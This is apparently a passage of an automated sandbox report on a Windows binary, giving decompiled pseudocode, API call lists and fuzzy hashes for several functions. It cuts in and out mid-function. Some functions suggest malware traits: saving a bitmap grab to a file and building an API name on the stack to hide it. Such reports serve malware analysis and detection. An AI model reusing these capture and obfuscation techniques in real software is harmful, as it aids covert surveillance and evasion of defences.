										if((_t268 & 0xc0000000) != 0xc0000000) {
											L32:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L32;
											}
											CloseHandle(_v12);
											_v44 = _t268 & 0x7fffffff;
											_t214 = 6;
											_push( &_v24);
											_push(_a12);
											memcpy(_t281 - 0x18,  &_v48, _t214 << 2);
											_t246 = E00433918();
											__eflags = _t246 - 0xffffffff;
											if(_t246 != 0xffffffff) {
												_t216 =  *_t189;
												_t218 = (_t216 & 0x0000003f) * 0x38;
												__eflags = _t218;
												 *((intOrPtr*)( *((intOrPtr*)(0x44df78 + (_t216 >> 6) * 4)) + _t218 + 0x18)) = _t246;
												goto L32;
											}
											E0041A8B9(GetLastError());
											 *( *((intOrPtr*)(0x44df78 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x44df78 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
											E0042DA2A( *_t189);
											L10:
											goto L2;
										}
									}
									_push(_t242);
									goto L21;
								} else {
									_t267 = E00433B29(_t204,  *_t189);
									__eflags = _t267;
									if(__eflags == 0) {
										goto L22;
									}
									_push( *_t189);
									L21:
									E004265C7(__eflags);
									return _t267;
								}
							}
							_t271 = GetLastError();
							E0041A8B9(_t271);
							 *( *((intOrPtr*)(0x44df78 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x44df78 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
							CloseHandle(_t253);
							__eflags = _t271;
							if(__eflags == 0) {
								 *((intOrPtr*)(E0041A8EF(__eflags))) = 0xd;
							}
							goto L2;
						}
						_t233 = _v44;
						__eflags = (_t233 & 0xc0000000) - 0xc0000000;
						if((_t233 & 0xc0000000) != 0xc0000000) {
							L9:
							_t234 =  *_t189;
							_t236 = (_t234 & 0x0000003f) * 0x38;
							_t178 =  *((intOrPtr*)(0x44df78 + (_t234 >> 6) * 4));
							_t33 = _t178 + _t236 + 0x28;
							 *_t33 =  *(_t178 + _t236 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							E0041A8B9(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t285 = _t278 - 0x18;
						_v44 = _t233 & 0x7fffffff;
						_t238 = 6;
						_push( &_v24);
						_push(_a12);
						memcpy(_t285,  &_v48, _t238 << 2);
						_t196 = 0;
						_t253 = E00433918();
						_t278 = _t285 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(E0041A8DC(__eflags)) =  *_t184 & 0x00000000;
						 *_t189 = _t264;
						 *((intOrPtr*)(E0041A8EF(__eflags))) = 0x18;
						goto L2;
					}
				} else {
					_t186 = E0041A8DC(_t288);
					 *_t186 =  *_t186 & 0x00000000;
					_t289 =  *_t186;
					 *_a8 = _t264;
					L2:
					return  *((intOrPtr*)(E0041A8EF(_t289)));
				}
			}

0x00433c65
0x00433c88
0x00433c8c
0x00433c8d
0x00433c8d
0x00433c8f
0x00433c92
0x00433c95
0x00433cb0
0x00433cb5
0x00433cb8
0x00433cba
0x00433cbc
0x00433cdb
0x00433ce2
0x00433ce9
0x00433cec
0x00433cf8
0x00433cfb
0x00433d03
0x00433d04
0x00433d07
0x00433d07
0x00433d0e
0x00433d10
0x00433d13
0x00433d1b
0x00433d1e
0x00433d8b
0x00433d8c
0x00433d92
0x00433d94
0x00433ddd
0x00433de0
0x00433de9
0x00433dec
0x00433def
0x00433df1
0x00433df1
0x00433df1
0x00433de2
0x00433de5
0x00433de5
0x00433df6
0x00433df9
0x00433e05
0x00433e0a
0x00433e16
0x00433e20
0x00433e24
0x00433e2e
0x00433e31
0x00433e3c
0x00433e41
0x00433e60
0x00433e63
0x00433e67
0x00433e68
0x00433e6e
0x00433e73
0x00433e76
0x00433e78
0x00433e7a
0x00433e7f
0x00433e81
0x00433e83
0x00433e86
0x00433e88
0x00433ea2
0x00433ec6
0x00433eca
0x00433ece
0x00433ed0
0x00433ed4
0x00433ed6
0x00433ee0
0x00433ee3
0x00433eea
0x00433eea
0x00433eea
0x00433eea
0x00433ed4
0x00433eef
0x00433efb
0x00433efd
0x00433f88
0x00433f88
0x00000000
0x00433f03
0x00433f03
0x00433f07
0x00000000
0x00000000
0x00433f0c
0x00433f1e
0x00433f26
0x00433f29
0x00433f2a
0x00433f2d
0x00433f34
0x00433f39
0x00433f3c
0x00433f70
0x00433f7a
0x00433f7a
0x00433f84
0x00000000
0x00433f84
0x00433f45
0x00433f5e
0x00433f65
0x00433d85
0x00000000
0x00433d85
0x00433efd
0x00433e8a
0x00000000
0x00433e43
0x00433e4a
0x00433e4d
0x00433e4f
0x00000000
0x00000000
0x00433e51
0x00433e53
0x00433e53
0x00000000
0x00433e59
0x00433e41
0x00433d9c
0x00433d9f
0x00433dba
0x00433dbf
0x00433dc5
0x00433dc7
0x00433dd2
0x00433dd2
0x00000000
0x00433dc7
0x00433d20
0x00433d27
0x00433d29
0x00433d60
0x00433d60
0x00433d6a
0x00433d6d
0x00433d74
0x00433d74
0x00433d74
0x00433d80
0x00000000
0x00433d80
0x00433d2b
0x00433d2f
0x00000000
0x00000000
0x00433d31
0x00433d40
0x00433d45
0x00433d48
0x00433d49
0x00433d4c
0x00433d4c
0x00433d53
0x00433d55
0x00433d58
0x00433d5b
0x00433d5e
0x00000000
0x00000000
0x00000000
0x00433cbe
0x00433cc3
0x00433cc6
0x00433ccd
0x00000000
0x00433ccd
0x00433c97
0x00433c97
0x00433c9c
0x00433c9c
0x00433ca2
0x00433ca4
0x00000000
0x00433ca9

APIs

Part of subcall function 0042D921: EnterCriticalSection.KERNEL32(00000000,00448628,0000001C,00433CB5,?,?,0042AD2A), ref: 0042D9BF
Part of subcall function 0042D921: LeaveCriticalSection.KERNEL32(00000000,?,?,0042AD2A,?,?,?,?,?,?,?,?,?,?,00433C2A,00000000), ref: 0042D9CC

Part of subcall function 00433918: CreateFileW.KERNEL32(00000000,00000000,?,00433D0E,?,?,00000000), ref: 00433935

GetLastError.KERNEL32 ref: 00433D79
__dosmaperr.LIBCMT ref: 00433D80
GetFileType.KERNEL32(00000000), ref: 00433D8C
GetLastError.KERNEL32 ref: 00433D96
__dosmaperr.LIBCMT ref: 00433D9F
CloseHandle.KERNEL32(00000000), ref: 00433DBF

Part of subcall function 0042D86A: SetStdHandle.KERNEL32(000000F6,00433DFE,00000000,?,0042AD2A,?,?,00433DFE,0042AD2A,00000000), ref: 0042D8C9

CloseHandle.KERNEL32(0042AD2A), ref: 00433F0C
GetLastError.KERNEL32 ref: 00433F3E
__dosmaperr.LIBCMT ref: 00433F45

Part of subcall function 0042DA2A: SetStdHandle.KERNEL32(000000F6,00000000,?,00000000,00000008,?,00426635,?,?,004264FD,?,004484C0,0000000C,004265A5,?), ref: 0042DA8A

Part of subcall function 004265C7: CloseHandle.KERNEL32(00000000), ref: 0042661D
Part of subcall function 004265C7: GetLastError.KERNEL32(?,004264FD,?,004484C0,0000000C,004265A5,?), ref: 00426627
Part of subcall function 004265C7: __dosmaperr.LIBCMT ref: 00426652

Strings

H, xrefs: 00433ECA

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: Handle$ErrorLast__dosmaperr$Close$CriticalFileSection$CreateEnterLeaveType
String ID: H
API String ID: 3626905059-2852464175
Opcode ID: a3ed2c3b0cf925fcf72b158f7625868f4f7bd9144f28886364d17bb358d77201
Instruction ID: aeba6b646ad1fc84991f1710b409261394a3f44cf5e04e3b6141d9a6edc3d31f
Opcode Fuzzy Hash: a3ed2c3b0cf925fcf72b158f7625868f4f7bd9144f28886364d17bb358d77201
Instruction Fuzzy Hash: D1A12472E041049FDF18AF68DC527AE3BA1AF0A325F14115EF811AF391D7389E16CB5A

Uniqueness

Uniqueness Score: 3.32%

Function 0040D10B, Relevance: 16.7, APIs: 11, Instructions: 168
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E0040D10B(signed int __edx, void* _a4, struct HDC__* _a8, WCHAR* _a12) {
				long _v8;
				intOrPtr _v14;
				intOrPtr _v18;
				intOrPtr _v22;
				void _v24;
				signed int _v30;
				signed int _v32;
				signed short _v40;
				intOrPtr _v44;
				char _v48;
				int _t45;
				signed int _t48;
				void* _t57;
				long _t63;
				int _t64;
				int _t80;
				int _t83;
				void* _t84;
				signed int _t94;
				void* _t102;
				int _t104;
				void* _t105;

				_t94 = __edx;
				_push( &_v48);
				_t104 = 0x18;
				_t45 = GetObjectW(_a4, _t104, ??);
				if(_t45 != 0) {
					_t48 = _v30 * _v32 & 0x0000ffff;
					if(_t48 != 1) {
						_t83 = 4;
						if(_t48 <= _t83) {
							L9:
							_push(0x28 + (1 << _t83) * 4);
							L10:
							_t105 = LocalAlloc(0x40, ??);
							 *_t105 = 0x28;
							 *((intOrPtr*)(_t105 + 4)) = _v44;
							 *(_t105 + 8) = _v40;
							 *((short*)(_t105 + 0xc)) = _v32;
							 *((short*)(_t105 + 0xe)) = _v30;
							_t57 = 0x18;
							if(_t83 < _t57) {
								 *(_t105 + 0x20) = 1 << _t83;
							}
							asm("cdq");
							 *((intOrPtr*)(_t105 + 0x10)) = 0;
							 *((intOrPtr*)(_t105 + 0x24)) = 0;
							_t63 = ( *((intOrPtr*)(_t105 + 4)) + 7 + (_t94 & 0x00000007) >> 3) * (_t83 & 0x0000ffff) *  *(_t105 + 8);
							 *(_t105 + 0x14) = _t63;
							_t64 = GlobalAlloc(0, _t63);
							_t84 = _t64;
							if(_t84 == 0) {
								L21:
								return _t64;
							} else {
								_t64 = GetDIBits(_a8, _a4, 0,  *(_t105 + 8) & 0x0000ffff, _t84, _t105, 0);
								if(_t64 == 0) {
									goto L21;
								}
								_t64 = CreateFileW(_a12, 0xc0000000, 0, 0, 2, 0x80, 0);
								_t102 = _t64;
								if(_t102 == 0xffffffff) {
									goto L21;
								}
								_v24 = 0x4d42;
								_v22 =  *_t105 +  *(_t105 + 0x14) +  *(_t105 + 0x20) * 4 + 0xe;
								_v18 = 0;
								_v14 =  *_t105 +  *(_t105 + 0x20) * 4 + 0xe;
								if(WriteFile(_t102,  &_v24, 0xe,  &_v8, 0) == 0 || WriteFile(_t102, _t105, 0x28 +  *(_t105 + 0x20) * 4,  &_v8, 0) == 0) {
									_push(_t102);
									goto L19;
								} else {
									_t80 = WriteFile(_t102, _t84,  *(_t105 + 0x14),  &_v8, 0);
									_push(_t102);
									if(_t80 != 0) {
										CloseHandle();
										_t64 = GlobalFree(_t84);
										goto L21;
									}
									L19:
									_t64 = CloseHandle();
									goto L21;
								}
							}
						}
						_t83 = 8;
						if(_t48 <= _t83) {
							goto L9;
						}
						_t83 = 0x10;
						if(_t48 <= _t83) {
							goto L9;
						}
						if(_t48 > _t104) {
							_t83 = 0x20;
							goto L9;
						}
						_t83 = _t104;
						_push(0x28);
						goto L10;
					}
					_t83 = 1;
					goto L9;
				}
				return _t45;
			}

0x0040d10b
0x0040d115
0x0040d118
0x0040d11d
0x0040d125
0x0040d137
0x0040d13d
0x0040d145
0x0040d149
0x0040d169
0x0040d176
0x0040d177
0x0040d17f
0x0040d183
0x0040d18c
0x0040d192
0x0040d199
0x0040d1a1
0x0040d1a5
0x0040d1a9
0x0040d1af
0x0040d1af
0x0040d1bd
0x0040d1c1
0x0040d1c6
0x0040d1cf
0x0040d1d5
0x0040d1d8
0x0040d1de
0x0040d1e2
0x0040d2b9
0x00000000
0x0040d1e8
0x0040d1f7
0x0040d1ff
0x00000000
0x00000000
0x0040d217
0x0040d21d
0x0040d222
0x00000000
0x00000000
0x0040d22d
0x0040d243
0x0040d248
0x0040d256
0x0040d26c
0x0040d28b
0x00000000
0x0040d28e
0x0040d299
0x0040d29f
0x0040d2a2
0x0040d2ac
0x0040d2b3
0x00000000
0x0040d2b3
0x0040d2a4
0x0040d2a4
0x00000000
0x0040d2a4
0x0040d26c
0x0040d1e2
0x0040d14d
0x0040d151
0x00000000
0x00000000
0x0040d155
0x0040d159
0x00000000
0x00000000
0x0040d15e
0x0040d168
0x00000000
0x0040d168
0x0040d160
0x0040d162
0x00000000
0x0040d162
0x0040d13f
0x00000000
0x0040d13f
0x0040d2bf

APIs

GetObjectW.GDI32(00405BC3,00000018,?), ref: 0040D11D
LocalAlloc.KERNEL32(00000040,00000001,00000000,00000000,?,?,?,?,?,0040CFEE,?,00000000,00405BC3,00405BC3,00000000), ref: 0040D179
GlobalAlloc.KERNEL32(00000000,?,?,?,?,?,?,0040CFEE,?,00000000,00405BC3,00405BC3,00000000), ref: 0040D1D8
GetDIBits.GDI32(00405BC3,00405BC3,00000000,?,00000000,00000000,00000000), ref: 0040D1F7
CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 0040D217
WriteFile.KERNEL32(00000000,?,0000000E,00000000,00000000), ref: 0040D264
WriteFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0040D281
WriteFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0040D299
CloseHandle.KERNEL32(00000000), ref: 0040D2A4
CloseHandle.KERNEL32(00000000), ref: 0040D2AC
GlobalFree.KERNEL32(00000000), ref: 0040D2B3

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: File$Write$AllocCloseGlobalHandle$BitsCreateFreeLocalObject
String ID:
API String ID: 1655479074-0
Opcode ID: 8b69c2b5ff174ab03ebf9abd5f61d8e12fd57cee42ff498c87c9abf55fefedfe
Instruction ID: 8b7d7c8ad6c6335ee7d03d523b1659f41e778b8bf9e2f2407cbdf0452a807aac
Opcode Fuzzy Hash: 8b69c2b5ff174ab03ebf9abd5f61d8e12fd57cee42ff498c87c9abf55fefedfe
Instruction Fuzzy Hash: 9551B175A00205ABD7209FA5DC44FAB7BF8FF48710F00812AFA85D7690D674D945CB68

Uniqueness

Uniqueness Score: 0.50%

Function 00410A5F, Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 64
libraryloaderUNIQUE

Download Yara Rule

C-Code - Quality: 58%

			E00410A5F(char _a4) {
				char _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				short _v24;
				char _v27;
				char _v28;
				intOrPtr _v32;
				char _v33;
				char _v34;
				short _v36;
				char _v37;
				char _v38;
				intOrPtr _v42;
				intOrPtr _v46;
				char _v47;
				char _v48;
				char _v49;
				char _v50;
				short _v52;
				char _v56;
				short _t29;
				short _t30;
				short _t31;
				short _t32;
				_Unknown_base(*)()* _t34;
				char _t40;
				char _t42;
				char _t44;

				_t29 = 0x6b;
				_t40 = 0x65;
				_t42 = 0x72;
				_t44 = 0x6e;
				_v24 = _t29;
				_t30 = 0x6c;
				_v14 = _t30;
				_t31 = 0x33;
				_v12 = _t31;
				_t32 = 0x32;
				_v10 = _t32;
				_v8 = 0;
				_v27 = 0;
				_t34 =  *0x419920; // 0x0
				_v22 = _t40;
				_v16 = _t40;
				_v50 = _t40;
				_v48 = _t40;
				_v37 = _t40;
				_v33 = _t40;
				_v20 = _t42;
				_v18 = _t44;
				_v56 = 0x36776f57;
				_v52 = 0x5234;
				_v49 = 0x76;
				_v47 = _t42;
				_v46 = 0x776f5774;
				_v42 = 0x73463436;
				_v38 = 0x52;
				_v36 = 0x6964;
				_v34 = _t42;
				_v32 = 0x6f697463;
				_v28 = _t44;
				if(_t34 != 0) {
					L2:
					return  *_t34( &_a4);
				}
				_t26 =  &_v56; // 0x36776f57
				_t34 = GetProcAddress(GetModuleHandleW( &_v24), _t26);
				 *0x419920 = _t34;
				if(_t34 != 0) {
					goto L2;
				}
				return _t34;
			}

0x00410a68
0x00410a6b
0x00410a6e
0x00410a71
0x00410a74
0x00410a78
0x00410a7b
0x00410a7f
0x00410a80
0x00410a86
0x00410a87
0x00410a8d
0x00410a90
0x00410a93
0x00410a98
0x00410a9c
0x00410aa0
0x00410aa3
0x00410aa6
0x00410aa9
0x00410aac
0x00410ab0
0x00410ab4
0x00410abb
0x00410ac1
0x00410ac5
0x00410ac8
0x00410acf
0x00410ad6
0x00410ada
0x00410ae0
0x00410ae3
0x00410aea
0x00410af0
0x00410b10
0x00000000
0x00410b14
0x00410af2
0x00410b01
0x00410b07
0x00410b0e
0x00000000
0x00000000
0x00410b19

APIs

GetModuleHandleW.KERNEL32(?,Wow64R), ref: 00410AFA
GetProcAddress.KERNEL32(00000000), ref: 00410B01

Strings

ctio, xrefs: 00410AE3
di, xrefs: 00410ADA
R, xrefs: 00410AD6
64Fs, xrefs: 00410ACF
tWow, xrefs: 00410AC8
Wow64R, xrefs: 00410AF2, 00410AF5
v, xrefs: 00410AC1

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: 64Fs$R$Wow64R$ctio$di$tWow$v
API String ID: 1646373207-4275827254
Opcode ID: 71649f07de5d6f72a2c86b48f8c5f92e9b9293022836f17f3ddd4172bc4cb605
Instruction ID: 48a818cce4be9747ca6fced26ae4adddc7f529e360f66e4eb63258cd27b6c3a9
Opcode Fuzzy Hash: 71649f07de5d6f72a2c86b48f8c5f92e9b9293022836f17f3ddd4172bc4cb605
Instruction Fuzzy Hash: 72219F61D5938DEADF01CBE8A8516EEBB74AF29700F10805AE504FB291E3714B44CB6E

Uniqueness

Uniqueness Score: 100.00%

Function 0040C870, Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 45
UNIQUE

Download Yara Rule

C-Code - Quality: 61%

			E0040C870(void* __ebx, void* __edx, signed int __ebp, signed int _a4, signed int _a8, intOrPtr _a12) {
				signed int _v0;
				intOrPtr _v12;
				signed int _v16;
				signed int _v28;
				signed int _v32;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr* _v52;
				char _v72;
				signed int _v76;
				signed int _v88;
				signed int _v92;
				char _v120;
				signed int _v124;
				char _v148;
				char _v156;
				char _v160;
				char _v164;
				char _v168;
				char _v176;
				void* __edi;
				void* __esi;
				signed int _t155;
				intOrPtr _t160;
				intOrPtr _t172;
				intOrPtr* _t179;
				signed int _t180;
				intOrPtr _t181;
				signed int _t186;
				void* _t188;
				void* _t192;
				void* _t196;
				signed int _t200;
				signed char _t211;
				signed int _t212;
				signed int _t218;
				signed int _t222;
				signed int _t225;
				signed int _t226;
				signed int _t235;
				void* _t239;
				signed int _t246;
				signed int _t250;
				signed int _t260;
				signed int _t264;
				signed int _t267;
				signed int _t268;
				signed int _t274;
				void* _t278;
				signed int _t289;
				signed int _t294;
				signed int _t297;
				void* _t298;
				intOrPtr* _t299;
				signed int _t300;
				signed int _t301;
				intOrPtr* _t302;
				signed int _t303;
				intOrPtr* _t304;
				signed int _t310;
				signed int _t312;
				signed int _t323;
				signed int _t325;
				signed int _t335;
				signed int _t336;
				signed int _t337;
				signed char _t338;
				signed char _t340;
				char* _t343;
				signed char* _t346;
				intOrPtr _t349;
				intOrPtr _t350;
				signed int _t354;
				signed int _t357;
				signed int _t359;
				intOrPtr _t361;
				signed int _t366;
				signed int _t369;
				signed int _t370;
				signed int _t371;
				signed int _t372;
				intOrPtr* _t373;
				void* _t377;
				intOrPtr _t387;
				signed int _t406;
				signed int _t407;
				signed int _t408;
				signed int _t409;
				signed int _t410;
				signed int _t411;
				signed char* _t412;
				char* _t414;
				signed int _t445;
				signed int _t446;
				intOrPtr _t447;
				signed int _t448;
				intOrPtr _t459;
				void* _t464;

				_t445 = __ebp;
				_t368 = __edx;
				_t298 = __ebx;
				_t155 = _a4;
				if(_t155 != 0) {
					__eflags = _t155 - 0x15555555;
					if(__eflags > 0) {
						E00415C7B(__edx, __eflags);
						goto L10;
					} else {
						_t294 = _t155 + _t155 * 2 << 2;
						__eflags = _t294 - 0x1000;
						if(__eflags < 0) {
							_t155 = E0041500C(__edx, __eflags, _t294);
							_t464 = _t464 + 4;
							__eflags = _t155;
							if(__eflags != 0) {
								goto L1;
							} else {
								goto L12;
							}
						} else {
							_t335 = _t294 + 0x23;
							__eflags = _t335 - _t294;
							if(__eflags <= 0) {
								L10:
								E00415C7B(_t368, __eflags);
								goto L11;
							} else {
								_t335 = E0041500C(__edx, __eflags, _t335);
								_t464 = _t464 + 4;
								__eflags = _t335;
								if(__eflags == 0) {
									L11:
									E0041A825(_t298, _t335, _t368, __eflags);
									L12:
									E0041A825(_t298, _t335, _t368, __eflags);
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									_t369 = _a8;
									_push(_t298);
									_t299 = _a4;
									_t406 = _t335;
									_t160 =  *((intOrPtr*)(_t299 + 0x10));
									__eflags = _t160 - _t369;
									if(__eflags < 0) {
										_push("invalid string position");
										E0041371B(_t299, _t370, __eflags);
										goto L35;
									} else {
										_t335 =  *(_t406 + 0x10);
										_t278 = _t160 - _t369;
										_push(_t445);
										_t459 = _a12;
										__eflags = _t459 - _t278;
										_t445 =  >  ? _t278 : _t459;
										__eflags =  !_t335 - _t445;
										if(__eflags <= 0) {
											L35:
											_push("string too long");
											E004136FB(_t299, _t370, __eflags);
											goto L36;
										} else {
											_push(_t370);
											_t370 = _t335 + _t445;
											__eflags = _t445;
											if(_t445 == 0) {
												L33:
												return _t406;
											} else {
												__eflags = _t370 - 0xfffffffe;
												if(__eflags > 0) {
													L36:
													_push("string too long");
													E004136FB(_t299, _t370, __eflags);
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													_push(_t299);
													_t300 = _v16;
													_push(_t406);
													_t407 = _t335;
													_t336 =  *(_t407 + 0x10);
													__eflags =  !_t336 - _t300;
													if(__eflags <= 0) {
														_push("string too long");
														E004136FB(_t300, _t370, __eflags);
														goto L51;
													} else {
														_push(_t370);
														_t370 = _t336 + _t300;
														__eflags = _t300;
														if(_t300 == 0) {
															L49:
															return _t407;
														} else {
															__eflags = _t370 - 0xfffffffe;
															if(__eflags > 0) {
																L51:
																_push("string too long");
																E004136FB(_t300, _t370, __eflags);
																asm("int3");
																_push(_t300);
																_t301 = _v32;
																_push(_t407);
																_t408 = _t336;
																__eflags = _t301;
																if(_t301 == 0) {
																	L64:
																	_t337 =  *(_t408 + 0x10);
																	_push(_t445);
																	_t446 = _v28;
																	__eflags =  !_t337 - _t446;
																	if(__eflags <= 0) {
																		_push("string too long");
																		E004136FB(_t301, _t370, __eflags);
																		goto L83;
																	} else {
																		_push(_t370);
																		_t370 = _t337 + _t446;
																		__eflags = _t446;
																		if(_t446 == 0) {
																			L81:
																			return _t408;
																		} else {
																			__eflags = _t370 - 0xfffffffe;
																			if(__eflags > 0) {
																				L83:
																				_push("string too long");
																				E004136FB(_t301, _t370, __eflags);
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				_push(_t301);
																				_t302 = _v52;
																				_push(_t446);
																				_t447 = _v48;
																				_push(_t408);
																				_t172 =  *((intOrPtr*)(_t302 + 0x10));
																				_t409 = _t337;
																				__eflags = _t172 - _t447;
																				if(__eflags < 0) {
																					_push("invalid string position");
																					E0041371B(_t302, _t370, __eflags);
																					goto L109;
																				} else {
																					_t239 = _t172 - _t447;
																					_push(_t370);
																					_t387 = _v44;
																					__eflags = _t387 - _t239;
																					_t370 =  >  ? _t239 : _t387;
																					__eflags = _t409 - _t302;
																					if(_t409 != _t302) {
																						__eflags = _t370 - 0xfffffffe;
																						if(__eflags > 0) {
																							goto L110;
																						} else {
																							__eflags =  *((intOrPtr*)(_t409 + 0x14)) - _t370;
																							if( *((intOrPtr*)(_t409 + 0x14)) >= _t370) {
																								__eflags = _t370;
																								if(_t370 != 0) {
																									goto L93;
																								} else {
																									__eflags =  *((intOrPtr*)(_t409 + 0x14)) - 0x10;
																									 *(_t409 + 0x10) = _t370;
																									if( *((intOrPtr*)(_t409 + 0x14)) < 0x10) {
																										_t246 = _t409;
																										 *_t246 = 0;
																										return _t246;
																									} else {
																										 *( *_t409) = 0;
																										return _t409;
																									}
																								}
																							} else {
																								E004077E0(_t337, _t370,  *(_t409 + 0x10));
																								__eflags = _t370;
																								if(_t370 == 0) {
																									L107:
																									return _t409;
																								} else {
																									L93:
																									__eflags =  *((intOrPtr*)(_t302 + 0x14)) - 0x10;
																									if( *((intOrPtr*)(_t302 + 0x14)) >= 0x10) {
																										_t302 =  *_t302;
																									}
																									__eflags =  *((intOrPtr*)(_t409 + 0x14)) - 0x10;
																									if( *((intOrPtr*)(_t409 + 0x14)) < 0x10) {
																										_t357 = _t409;
																									} else {
																										_t357 =  *_t409;
																									}
																									__eflags = _t370;
																									if(_t370 != 0) {
																										E004170E0(_t357, _t302 + _t447, _t370);
																									}
																									__eflags =  *((intOrPtr*)(_t409 + 0x14)) - 0x10;
																									 *(_t409 + 0x10) = _t370;
																									if( *((intOrPtr*)(_t409 + 0x14)) < 0x10) {
																										 *((char*)(_t409 + _t370)) = 0;
																										goto L107;
																									} else {
																										 *((char*)( *_t409 + _t370)) = 0;
																										return _t409;
																									}
																								}
																							}
																						}
																					} else {
																						_t250 = _t370 + _t447;
																						__eflags =  *(_t409 + 0x10) - _t250;
																						if(__eflags < 0) {
																							L109:
																							_push("invalid string position");
																							E0041371B(_t302, _t370, __eflags);
																							L110:
																							_push("string too long");
																							E004136FB(_t302, _t370, __eflags);
																							asm("int3");
																							asm("int3");
																							asm("int3");
																							asm("int3");
																							asm("int3");
																							asm("int3");
																							asm("int3");
																							asm("int3");
																							asm("int3");
																							asm("int3");
																							asm("int3");
																							asm("int3");
																							asm("int3");
																							_push(_t409);
																							_push(_t370);
																							_t371 = _v76;
																							_t410 = _t337;
																							__eflags = _t371 - 0xffffffff;
																							if(__eflags == 0) {
																								_push("string too long");
																								E004136FB(_t302, _t371, __eflags);
																								goto L132;
																							} else {
																								__eflags = _t371 - 0xfffffffe;
																								if(__eflags > 0) {
																									L132:
																									_push("string too long");
																									E004136FB(_t302, _t371, __eflags);
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									_push(_t302);
																									_t303 = _v92;
																									_push(_t410);
																									_t411 = _t337;
																									__eflags = _t303;
																									if(_t303 == 0) {
																										L145:
																										_push(_t371);
																										_t372 = _v88;
																										__eflags = _t372 - 0xfffffffe;
																										if(__eflags > 0) {
																											_push("string too long");
																											E004136FB(_t303, _t372, __eflags);
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											_push(_t447);
																											_t448 = _t337;
																											_push(_t372);
																											_t179 = _v0;
																											_t373 =  *_t179;
																											 *_t179 = _t179;
																											_t180 = _v0;
																											 *((intOrPtr*)(_t180 + 4)) = _t180;
																											_a4 = 0;
																											__eflags = _t373 - _v0;
																											if(_t373 == _v0) {
																												L176:
																												return _t180;
																											} else {
																												_push(_t303);
																												_push(_t411);
																												do {
																													_t105 = _t373 + 0x1c; // 0xffffffff
																													_t181 =  *_t105;
																													_t106 = _t373 + 8; // 0x40ba76
																													_t412 = _t106;
																													_t304 =  *_t373;
																													__eflags = _t181 - 0x10;
																													if(_t181 < 0x10) {
																														goto L172;
																													} else {
																														_t338 =  *_t412;
																														__eflags = _t181 + 1 - 0x1000;
																														if(_t181 + 1 < 0x1000) {
																															L171:
																															L0041503F(_t338);
																															_t464 = _t464 + 4;
																															goto L172;
																														} else {
																															__eflags = _t338 & 0x0000001f;
																															if(__eflags != 0) {
																																L177:
																																E0041A825(_t304, _t338, _t369, __eflags);
																																asm("int3");
																																asm("int3");
																																asm("int3");
																																_t186 = _v124 & 0x00000017;
																																 *(_t338 + 0xc) = _t186;
